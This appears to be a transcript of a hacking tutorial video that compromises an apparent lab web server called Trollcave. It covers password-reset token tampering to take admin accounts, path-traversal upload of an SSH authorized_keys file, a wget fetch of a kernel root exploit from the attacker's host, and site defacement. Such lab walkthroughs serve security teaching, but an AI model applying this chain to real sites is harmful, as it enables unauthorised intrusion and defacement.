Hey guys, welcome to my channel. Imagine if you are developing a web application and you are wondering if it's hackable or not. So in today's video, I'll be showing you how hackers can exploit your website vulnerabilities and take full control over your website. Once hackers are able to fully control your web application, they can do many things, including defacing your own website. Defacing basically means changing the look of the website to say that a hacker has been here before. And in today's video, I'll be showing you how hackers can actually do that step by step and ultimately deface your own website. Throughout this video, you'll be seeing a variety of pentesting techniques. So please, I ask you to carry out these techniques on devices that you have the permission to test on or devices that you actually own. As always, your support means a lot to me. So if you guys like this video and you would like to see more videos like this one, please hit the like button, share it with your friends, and subscribe to the channel for more content like this one. Let's dive into the video. So here I have the website that I will try to hack into. Now each hacker is different, so they would have their own unique way of finding vulnerabilities, but in my case, I like to first test out the functionality of the website by using it as a normal user. By that, I mean going to visit every page and every feature on this website. In this case, we have a blog website called Trollcave. So let's check it out. So we can see we have a home screen and we have a bunch of blogs in here. Just click on random blogs, read even some of the vlogs, maybe we find some useful information in them. This one doesn't have any valuable information. Let's check out the password reset blog. Looks like this is some valuable information here. It was posted by the admin. So let's keep that in mind. We can see the online users and the newest users in here. If you click on them, we can see the user profile. Go back to the main page. We have a registration button. Let's click on it. And looks like the registration is currently closed. That's fine. Interesting. We have a login tab and looks like the users can log in from this page. If we click on register a new account, it brings us back to registration is currently closed. So yeah, once we have checked out the website and tested its features as a normal user, in this case, this website doesn't have many features because it's a simple blog website. Next, I would move into scanning the server hosting this website for any open ports using nmap. So I'll open my Terminator window and I will do sudo nmap -port 1 until port 65535. This is to specify the port range. -A for advanced scanning, -T4 for aggressive timing to scan faster, and -SS to specify the TCP SYN scan, -SV to enable identifying the service running on that port, and lastly, the domain name of the website, which is trollcaves.com. Let's give it some time to scan all of the ports. And cool, we see that we have two open ports. One is port 22 for SSH, and one is for HTTP port 80 running Nginx. And that's some good information to know that we are able to SSH into this server, which is running Ubuntu as the operating system. So we have to keep that in mind as well. Let's go back to the website. And the most interesting blog that we see here is the password reset blog. It looks like it's giving us useful tips and specific information about the password reset feature in this website. And this blog, again, is posted by the admin user, is basically telling us that they have implemented a new password_resets in Rails. This tells me that they are using Ruby on Rails. In case you don't know it, it is a server-side web application framework written in Ruby. And to learn more about this password reset feature, we can either do some Googling or we can utilize our artificial intelligence friend, ChatGPT. So let me navigate to it. And here we have ChatGPT, our AI friend. And let's ask ChatGPT, what is the password_resets function in Ruby on Rails? And what is its path, basically? And awesome, gives us a bunch of some useful information, description about the feature, and more information on how to use it. but I am most interested in how we can access that feature through the browser. And looks like the new action, it displays the forget password form. And if we go down in here, it tells us the URLs for these paths would typically follow the pattern password resets /new. And it looks like this is the path that we can access through the browser since it's using the GET request. So again, this is the path that is used by the user to initiate the password reset process by providing their email address. So let's see if it's actually configured on this website. I'm gonna copy this, come back here, I'm gonna delete this and paste it. Enter, and great, it looks like we are able to change the password from here. Sometimes the admins forget to restrict these kinds of pages, and sometimes even these pages doesn't even work. So let's see if it actually functions properly. So normally I would create a new account by registering, and I would use that username in here, but since the registration is currently closed on this website, I will simply use a random username from the list that we have on the right. Let's try this username, only me. Click on reset password, and cool, we get a message saying reset email is sent, and there's an interesting link with it. It looks like this is the edit function for the password reset controller, and ChatGPT actually told us about this as well. Let's visit this link. So I'll select it and open it in a new tab. And wow, just like that, this is the page in which we can reset the password of the username only me. And it's not even requiring any type of authentication. This is a huge vulnerability that we found. Again, this is a huge vulnerability. Again, let's see if this actually works. So I'll put in the password. You've been hacked. Write it again. Click on reset. And wow, it looks like we are logged in as only me now. So we just found a major vulnerability in the password resets controller, and I exploited that vulnerability since the password reset functionality was misconfigured by the admin on this website. And this happens a lot on online websites, where admins forget to configure the right features on their website, which leads to vulnerabilities like this. Normally we would stop here and report that to the administrator, but in this case, let's dive deeper and try to take root access on the server that is hosting this website. Okay, so we are logged in as a normal user called OnlyMe. Let's check out the new member tools that we can use in here. So we have a file manager in which we can upload files. We have an inbox tab, and we can send a private message from here as well. We can post a blog, and in the users tab, we can see all of the users and their role in here. And it looks like the user King has super admin privileges, as you can see. Very interesting that we can see that. If we go to preferences, we can update the user profile information from this tab. Let's go to home. Let's see if there's anything different in here. And looks like we have a couple of new blogs actually. The Markdown blog, and looks like it's saying that we can use Markdown to format the blog posts. Very nice. Let's go back to the username lists. And we know that King is the super admin in here. So I'm wondering if I am able to reset his password the same way I did with this account, the only me username. So I will log out from here. Let's go back to the password resets function. And let's try putting King name in here. Click on reset. And looks like we can only reset normal members for now. Okay, that's fine. But remember, we got a link when we reset the password of only me. Maybe we can modify that username directly from the link. Let's actually try that. So I'll go back. For the username, I'll use only me once again. Hit reset. And here we have the link. I will copy it and paste it in a new tab. And I will change this username to King. Hit enter. Okay, so it says King in the top URL in here, but it's showing the only me username in here. I'm not sure if this will work or not, but let's try anyways. For the password, I will type you've been hacked. You've been hacked once again. Click on reset. And look at that. We are now logged in as super admin on this website. So this vulnerability works on both admins and regular users. That's just great. Maybe not so much for the admins. Let's check out this account the same way we did with Only Me. So in the preferences, we can update the profile from here. We have a reports tab. Let's check out the admin panel. This is the most interesting tab so far. We can enable file upload, enable registration. We can change the activation tab from here as well. This is really nice. We have a file manager tab. Looks like it's the same as the other user. We have another inbox. We can post a blog. If we click on users, looks like we can actually ban or unmod the moderators. And for regular users, we can make them moderators or ban them. This is nice. Let's go to home. And looks like we have a couple of new blog posts in here as well. So sudo give me sudo. Let's click on that. So it looks like it's talking about giving sudo to the Rails username. This is interesting because now we know that there is a username called Rails on this server that we can use later on. Let's go back to the home page and let's check out the other blogs. And I didn't find anything interesting in the other pages. Let's go back to the interesting tab, which is the admin panel. So again, we can enable and disable the upload and the registration features from here. And I am interested in the file upload feature, because we might be able to upload a malicious file and gain access using that. So I will enable that and save that setting. Looks good. Let me go to the file manager and I'll try to upload some random file. Let's see if it gets uploaded. So this is a random screenshot. Let me try to upload that. And cool. It looks like it's uploaded correctly. Let's check if we are able to access it from the browser. And we actually can see the path from the Preferences tab. So if I go to Preferences, here we can see the full path of the file. If I click on the drop-down menu, I can see that this is the file that I just uploaded. And it's located in Uploads King directory. So let me navigate to that. Actually, I'm gonna open this image, crown.png. And cool, we can see the file from here. Let me see if we can do some path traversal from here. And looks like we can't. The admin has restricted that. That's fine. Let's go back. Now, I normally gather more information to check for any known vulnerabilities by Googling the service that is running on the website. And in this case, we know that this website is built using Ruby on Rails. So I will do some research on any known security vulnerabilities. This will actually save me time because I won't have to invest my energy in attempting to upload some random shells in hopes of getting an exploit or a reverse shell. So let me do a quick research about this. After some Googling I did, I found some useful information, and this is the most useful so far. It's actually on rubyonrails.org website under the section 4.2 file uploads. It mentions that if you store file uploads at var www uploads and the user enters a file name like that, it may overwrite an important file. So that leads me to think that we are able to exploit a path traversal on this website. But that didn't really work when I tried it, as you have seen on the browser. But looks like if we do it using the file upload method, then it's possible to exploit that path traversal vulnerability. Let me show you what I mean. So if I go back to the preferences again, we can see that the file that we will upload will go to this exact location. And if I wanted to upload the file to, let's say, the uploads folder instead of the King folder, all I have to do is to tell it to go back to the parent directory, which in this case is called the uploads folder. And we can tell it that by using .. So currently the path is like this. So whatever we upload will land in here. And if I wanted to upload the file that I want into this directory instead of the King directory, all I have to do is tell it that by using .. And if the website accepts this notation, it is indeed vulnerable for this type of path traversal attack. Let me show you exactly how I'm gonna do it. I will fire up Burp Suite to intercept the packets and modify them. And here we have the file upload manager. I'll try to upload some random file. And if I turn on the interceptor, click on upload, and here we have the actual request. So I will basically try to add this in front of the file name in hopes to save it in the mother directory. We're basically trying to escape of the kings folder. Let's try that. So I'll forward that request. Looks like it got uploaded. Let's see if it got uploaded to where we want. If I go to preferences, doesn't look like that worked actually. So let me try something else. Maybe what if I put a name for this file as the alternative file name? So I would add the notation just like that in here. Let's try that. I'll choose a file once again and let's upload it like that. Doesn't like that as well. Let me actually give it a name in the alternate file name. Gonna call it bang. Click on upload and awesome, looks like it went through. Let's double check the exact location of this file. And yep, as you can see, we have uploaded a file to a different directory on the website server. And that is good news for us, but it's not good news for the developer of this website, because with this vulnerability, we are able to break out of the assigned uploads folder and put our files, maybe malicious files, wherever we want on the server. We can put them wherever we want on the server, unless we need some type of permission on that specific file on the server, of course. And since we know for a fact that SSH is running on this website server, I can possibly upload my SSH public keys to the SSH folder on this server and log in to the server using that. Let me show you what I mean. I'll go to the file manager. Let me actually close the burp suite and use the normal browser. So I will go to the file manager, and this time I'll upload my SSH public keys, and this time I'll upload my SSH public keys, which are located in home Kali /.ssh, and the file name is id_rsa.pub. I'll upload that. Pub basically stands for public, by the way. And since the uploaded files will be uploaded in the king directory, we need to escape that. Let me show you what I mean once again. Okay, so here's the exact path. So as you can see, we have 1, 2, 3, 4, 5, and 6 forward slashes, and this is the root directory. So I will need to cd back into this directory, and we can do that using the same notation, basically doing this // to the amount of forward slashes in here. And since we want to move back 6 times, I'm gonna put 6 forward slashes, and again we got 6 because we have 1, 2, 3, 4, 5, 6 directories to escape from. And since we are here, this will actually act as the root directory. I will navigate to the home directory and specify the user directory, which is Rails, and the .ssh file is located in the Rails account, and the Rails account has the .ssh directory in it, and I want to put my public keys inside this directory. So I will use this path. I'm gonna copy it, and let's try to upload it this way. And actually I will actually name it as authorized_keys. So in the SSH folder, there is a file called authorized_keys. This file allows secure connections to be set up with known public keys. And this is a default file, by the way. So I will rename my public key to authorized keys to basically override it and tell the server that you can trust me. I'm one of the good guys. By doing this, it should allow me to SSH into the server without using any key phrase or any type of authentication. Let me upload this. And awesome, looks like it got uploaded correctly. I will double check from the preferences file. I'll check the actual path once again. And yep, looks good. As I explained, this is the root directory, and I uploaded my public keys in a file called authorized_keys. Now it's time to try to SSH into the server, since I just uploaded the public key into it. Let me clear this. So I will do SSH -i id_rsa rails at trollcaves.com. Hit enter, and awesome, just like that, we are inside the server that this website is running on. Let me do ID to check this user permissions, and looks like we are a regular user. We are not root yet, which is fine. Can always try to escalate. Let me run a comfortable shell in here. Let's do Python. Now let me snoop around this server to see if I can find anything interesting. Alright, so far, surprisingly, from the Rails account, it was possible to view the files inside every other user's home folder. In the King's home folder, I found an interesting calculator script. In the King's home folder, for example, I found an interesting calculator script. Looks like it's in a JavaScript. Let's take a look into it. And here we see the source code of the script. Looks like it starts a server on port 888 on the localhost interface. Let's exit from here, and I will confirm that by doing netstat-pant. And we can see that it's indeed listening on port 888. We can take a deeper look at this later on, so let me keep snooping around. Now, since we know this Trollcave website is hosted using Nginx, let me check out the Nginx sites enable configuration to double check that. So I will do cd etc nginx sites enabled. Let me nano that file. And cool, so we have the root directory in which this server listens on. Let me try to change this and tell it to look for the index.html file that is located in a different location than this. So let's say index.hacked.html. And looks like we can't actually modify this file, unfortunately, because we see this warning modifying a file which is not locked. Check directory permissions. Let me try to save it. And yep, permission denied, since we don't have writing permissions on this file. We are just a regular user. That's fine. I'll exit from here. So my main goal now is to escalate my privileges to a root user in order to deface this website. Let me check out the OS version actually. Sometimes developers forget to update or even upgrade their server version, in which can be vulnerable to public exploits. Let me clear this screen. I'll do cat etc os release. And we can see that the server is running Ubuntu version 16.044. So let me do some Googling on this specific version and see if there is an exploit for this specific Ubuntu version that we could use. Okay, so this was actually the first link that I found, and looks like this is the right exploit for this version, 16.044. This exploit is advertised to give us a local privilege escalation, so let's hope that will work. To confirm this is the right one actually, let me do a uname a on the server. This will tell me the exact kernel version, and looks like it's kernel number 140. Let me check here, and yep, tested on kernel 140. That's perfect. So I will download this exploit to my local machine, and here we have it. As you can see, it's a .c file, meaning that I will need to compile it first in order for us to use it. So let me actually compile it. I'll open a new terminal window and I will do sudo gcc, and the file I want to compile is located in home downloads, and that's the file name. I will do -o to rename the output file, and I will name it expo. Hit enter, put in the sudo password, and looks good. I'll do ls, and here we can see the compiled file. Now I need a way to transfer this file to this server. The simplest way is to spin up a local Apache 2 server by doing service Apache 2 start. Then I will do sudo move expo, which is the file name. I'll move it to var www.html. Now currently this file is now hosted on our local Apache 2 server, which is also accessible by Trollcave website server, since they are both on the same network, so both can see each other. Let me do ifconfig on the Kali machine to see what's my Kali Linux IP address, which is used to host this expo file, and looks like it's 192.168.0.242. I'll copy that. Come here, I will do wget 192.168.0.242 / expo. So basically we're doing this to download this expo file. Hit enter, I'll do ls, and looks like it didn't download because we are inside this restricted directory. So let me actually change my directory to my home directory, which is now home Rails. I'll clear this screen and try to download it again. And awesome, it got downloaded successfully. I'll do ls, and here we have the file. Awesome. And to run this as an executable, so I will do chmod +x expo, and I will run it using ./expo. Once I hit enter, hopefully this will escalate our privileges into a root user. And awesome, just like that, we have successfully rooted this website server by using an exploit that targets the outdated kernel version running on it. And if I do ID, as you can see, we are now logged in as root. So let's deface this website real quick. And there are many ways to deface this website, but in my case, I will simply edit the index.html file. So I will do nano var www trollcave public index.html, delete all of the contents, and I will write my own code this time. And in here I will put the image URL, and we can choose any image really, but in my case I'll just Google "you have been hacked," go to images. I like this one. I will copy the image link, come back here and give it the URL. Save this file. And the moment of truth, if we go to the home directory of the Trollcave's website, and there you have it. This blog website is now successfully defaced. This website had many vulnerabilities, as you saw, and it was a good example of a weak website security. If you are a developer and you want to secure your app from hackers trying to break into your website, let me know down in the comments if this was helpful for you, as I showed a brief demonstration of how a website usually gets hacked. Even though this was a simple example, stay tuned for future videos in which I will take on more complex and much more secure websites. And the best way to stay tuned is to subscribe to the channel if you haven't already done so, of course. And don't forget to like this video for more cool videos like this one.